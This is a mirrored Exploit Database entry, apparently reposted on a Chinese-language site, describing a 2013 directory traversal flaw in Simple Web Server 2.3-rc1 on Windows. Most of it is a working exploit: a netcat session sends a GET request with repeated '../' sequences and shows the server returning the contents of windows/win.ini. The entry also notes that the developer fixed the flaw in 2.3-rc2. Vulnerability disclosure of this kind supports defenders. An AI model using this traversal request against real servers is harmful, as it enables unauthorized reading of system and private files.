Simple Web Server 2.3-rc1 – Directory Traversal

• Exploit Database
• 109 阅读

• 作者： CwG GeNiuS
  日期： 2013-01-04
• 类别：

  • webapps
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/23886/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62

  # Exploit Title: Simple Webserver 2.3-rc1 Directory Traversal # Date: 01/02/2013 # Exploit Author: CwG GeNiuS # Vendor Homepage: http://www.pmx.it # Software Link: http://www.pmx.it/download/sws-2.3-rc1-i686.exe # Version: 2.3-rc1 (and earlier) # Tested on: Windows 7 Enterprise SP1 # #Vulnerability: When removing the preceding "/" from a GET # request the webserver allows directory # traversal. # #Fix: I have spoken with the developer who has now # released 2.3-rc2 to correct the vulnerability       root@bt:~# nc -v 192.168.1.132 80 192.168.1.132: inverse host lookup failed: Unknown server error : Connection timed out (UNKNOWN) [192.168.1.132] 80 (www) open GET ../../../../../../../../windows/win.ini http/1.1   HTTP/1.1 400 Bad Request Server: PMSoftware-SWS/2.3 Date: Wed, 02 Jan 2013 22:45:2 GMT Connection: close   HTTP/1.1 200 Ok Server: PMSoftware-SWS/2.3 Date: Wed, 02 Jan 2013 22:45:2 GMT Accept-Ranges: bytes Content-type: Content-Length: 403   ; for 16-bit app support [fonts] [extensions] [mci extensions] [files] [Mail] MAPI=1 [MCI Extensions.BAK] 3g2=MPEGVideo 3gp=MPEGVideo 3gp2=MPEGVideo 3gpp=MPEGVideo aac=MPEGVideo adt=MPEGVideo adts=MPEGVideo m2t=MPEGVideo m2ts=MPEGVideo m2v=MPEGVideo m4a=MPEGVideo m4v=MPEGVideo mod=MPEGVideo mov=MPEGVideo mp4=MPEGVideo mp4v=MPEGVideo mts=MPEGVideo ts=MPEGVideo tts=MPEGVideo